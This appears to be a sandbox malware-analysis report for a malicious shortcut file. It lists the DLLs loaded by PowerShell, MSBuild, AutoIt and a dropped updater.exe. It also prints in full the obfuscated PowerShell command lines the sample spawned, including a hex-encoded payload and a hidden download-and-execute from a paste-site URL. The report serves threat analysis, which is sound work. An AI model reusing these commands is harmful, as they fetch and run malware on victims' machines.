Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\faggbgb\AutoIt3.exe	Section loaded: wsock32.dll
Source: C:\faggbgb\AutoIt3.exe	Section loaded: version.dll
Source: C:\faggbgb\AutoIt3.exe	Section loaded: winmm.dll
Source: C:\faggbgb\AutoIt3.exe	Section loaded: mpr.dll
Source: C:\faggbgb\AutoIt3.exe	Section loaded: wininet.dll
Source: C:\faggbgb\AutoIt3.exe	Section loaded: iphlpapi.dll
Source: C:\faggbgb\AutoIt3.exe	Section loaded: userenv.dll
Source: C:\faggbgb\AutoIt3.exe	Section loaded: uxtheme.dll
Source: C:\faggbgb\AutoIt3.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\faggbgb\AutoIt3.exe	Section loaded: wsock32.dll
Source: C:\faggbgb\AutoIt3.exe	Section loaded: version.dll
Source: C:\faggbgb\AutoIt3.exe	Section loaded: winmm.dll
Source: C:\faggbgb\AutoIt3.exe	Section loaded: mpr.dll
Source: C:\faggbgb\AutoIt3.exe	Section loaded: wininet.dll
Source: C:\faggbgb\AutoIt3.exe	Section loaded: iphlpapi.dll
Source: C:\faggbgb\AutoIt3.exe	Section loaded: userenv.dll
Source: C:\faggbgb\AutoIt3.exe	Section loaded: uxtheme.dll
Source: C:\faggbgb\AutoIt3.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: fsg5PWtTm2.lnk

LNK file: ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbg source: powershell.exe, 0000000E.00000002.2538291906.000001CAB4EBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 0000000E.00000002.2538689516.000001CAB4F1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2534114486.000001CAB4C30000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ment.Automation.pdb source: powershell.exe, 0000000E.00000002.2538689516.000001CAB4F1C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: powershell.exe, 0000000E.00000002.2534114486.000001CAB4C30000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: updater.exe, 0000001B.00000003.1695944699.0000000005F89000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1698696022.0000000005E68000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1707041169.0000000006004000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868331767.0000000005EF8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868202399.0000000006019000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1873378059.0000000006094000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1945401358.0000000005DC8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1945264320.0000000005EE9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: updater.exe, 0000001B.00000003.1695944699.0000000005F89000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1698696022.0000000005E68000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1707041169.0000000006004000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868331767.0000000005EF8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868202399.0000000006019000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1873378059.0000000006094000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1945401358.0000000005DC8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1945264320.0000000005EE9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb} source: powershell.exe, 0000000E.00000002.2538291906.000001CAB4EBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: powershell.exe, 0000000E.00000002.2464474213.000001CA9ACCD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: _3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.2538689516.000001CAB4F1C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 6?ll\System.pdb source: powershell.exe, 0000000E.00000002.2538291906.000001CAB4EBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 0000000E.00000002.2534114486.000001CAB4C30000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Cmt'}).Name).Invoke((Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Gome'}).Name).Invoke('Nect',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Cmt'}).Name).Invoke((Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Gome'}).Name).Invoke('In-Exion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value\|Get-Member)\|Where-Object{(Get-Variable _).Value.Name-ilike'nl*a'}).Name).Invoke((GCI Variable:\s).Value)\|ForEach{(Get-Item Variable:/_).Value-As'Char'}))))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Cmt'}).Name).Invoke((Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Gome'}).Name).Invoke('Nect',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Cmt'}).Name).Invoke((Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Gome'}).Name).Invoke('In-Exion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value\|Get-Member)\|Where-Object{(Get-Variable 